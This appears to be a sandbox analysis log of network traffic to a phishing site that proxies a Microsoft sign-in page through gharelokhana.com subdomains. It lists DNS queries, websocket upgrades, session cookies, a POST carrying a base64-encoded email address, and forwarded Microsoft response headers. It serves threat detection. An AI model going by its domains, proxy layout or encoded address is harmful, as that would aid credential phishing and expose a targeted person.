            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0Sec-WebSocket-Key: pKuI03QTsSX4tFr4lzWD4A==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /common/instrumentation/dssostatus HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0
            Source: global trafficHTTP traffic detected: GET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0Sec-WebSocket-Key: SzkEBxFnDrbAW8ZJfQXPHQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0Sec-WebSocket-Key: NJjrd1Wyk2YdfBgR/4U5WA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0Sec-WebSocket-Key: 8IUm0HYxC7F0Pubj0TCIAg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; brcap=0Sec-WebSocket-Key: 3gu1mlhK/I6QVYN1Ldc5tQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; brcap=0Sec-WebSocket-Key: nB5nUKYjSWUUM2IeJszgvQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; brcap=0Sec-WebSocket-Key: BTiy7LKwCIUvNrGTG/iqew==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; brcap=0Sec-WebSocket-Key: /AqC7Lx6K6mLPC7QDIE/Zw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; brcap=0Sec-WebSocket-Key: YJO9FgX9QSCi5rvDpIA1Hg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; brcap=0Sec-WebSocket-Key: 9GYZ6r0MH1FrVFFleA1O4w==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; brcap=0Sec-WebSocket-Key: x9Vt/SDt0JE+s/8hgaAZkw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; brcap=0Sec-WebSocket-Key: d9XFz1lKG4ywGolkYqwOYg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; brcap=0Sec-WebSocket-Key: bGRlan2jHQSq7eQrtpFPcQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; brcap=0Sec-WebSocket-Key: uJe7cZLbEZ1ebTcDlTD8OA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficDNS traffic detected: DNS query: linkprotect.cudasvc.com
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: google.dz
            Source: global trafficDNS traffic detected: DNS query: www.google.dz
            Source: global trafficDNS traffic detected: DNS query: alvoradavisual.com.br
            Source: global trafficDNS traffic detected: DNS query: djdjkdlellekkff.gharelokhana.com
            Source: global trafficDNS traffic detected: DNS query: e7a91062-5bf3911d.gharelokhana.com
            Source: global trafficDNS traffic detected: DNS query: 43042841-5bf3911d.gharelokhana.com
            Source: global trafficDNS traffic detected: DNS query: 82ce8558-5bf3911d.gharelokhana.com
            Source: global trafficDNS traffic detected: DNS query: l1ve.gharelokhana.com
            Source: global trafficDNS traffic detected: DNS query: 67f9d952-5bf3911d.gharelokhana.com
            Source: global trafficDNS traffic detected: DNS query: 5088df79-5bf3911d.gharelokhana.com
            Source: global trafficDNS traffic detected: DNS query: wwwms.gharelokhana.com
            Source: unknownHTTP traffic detected: POST /?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: keep-aliveContent-Length: 5206Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://djdjkdlellekkff.gharelokhana.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9AAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 07:24:30 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:24:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 73783743-244d-455c-b441-0047e8dbb100x-ms-ests-server: 2.1.19568.3 - SEC ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:24:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 50c1e8d7-743b-4097-84d4-ab0eb0d40300x-ms-ests-server: 2.1.19492.3 - SEC ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:24:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: eac4b1bb-d9ec-45a2-991a-84a861388201x-ms-ests-server: 2.1.19492.3 - SEC ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:24:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: no-store, no-cachex-ms-correlation-id: d9dda0c3-f1df-40aa-9481-7bbba057574bx-ua-compatible: IE=Edgex-cache: CONFIG_NOCACHEx-msedge-ref: Ref A: 2EBDA27659CF4F16BE1D4C5A5E4AD0D4 Ref B: AMS231032604035 Ref C: 2024-12-05T07:24:49Zaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:24:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 713cb92a-3ead-48e3-bdad-6d59e967a301x-ms-ests-server: 2.1.19492.3 - FRC ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:25:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 6bd0b468-503d-4678-8aef-df1fc7e10c00x-ms-ests-server: 2.1.19492.3 - SEC ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:25:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: b6dff307-74e4-4260-b77d-a31814300a00x-ms-ests-server: 2.1.19568.3 - WEULR1 ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:25:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 4cffd087-8a4a-487d-ac0a-b13f98949b01x-ms-ests-server: 2.1.19492.3 - FRC ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:25:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 3309dc19-c186-4179-b53d-0dff4cc90e00x-ms-ests-server: 2.1.19568.3 - WEULR1 ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:25:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 12e44ffb-0746-4858-b289-2a0dcd727700x-ms-ests-server: 2.1.19492.3 - NEULR1 ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:25:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: b9c06676-a621-4407-907a-3e014c9c4b00x-ms-ests-server: 2.1.19492.3 - FRC ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:26:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: cf117a4c-e308-41ec-88ae-bf2977b59d01x-ms-ests-server: 2.1.19492.3 - FRC ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:26:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: d3e330e8-12d7-4743-8cb4-73dbd5dd7101x-ms-ests-server: 2.1.19492.3 - SEC ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
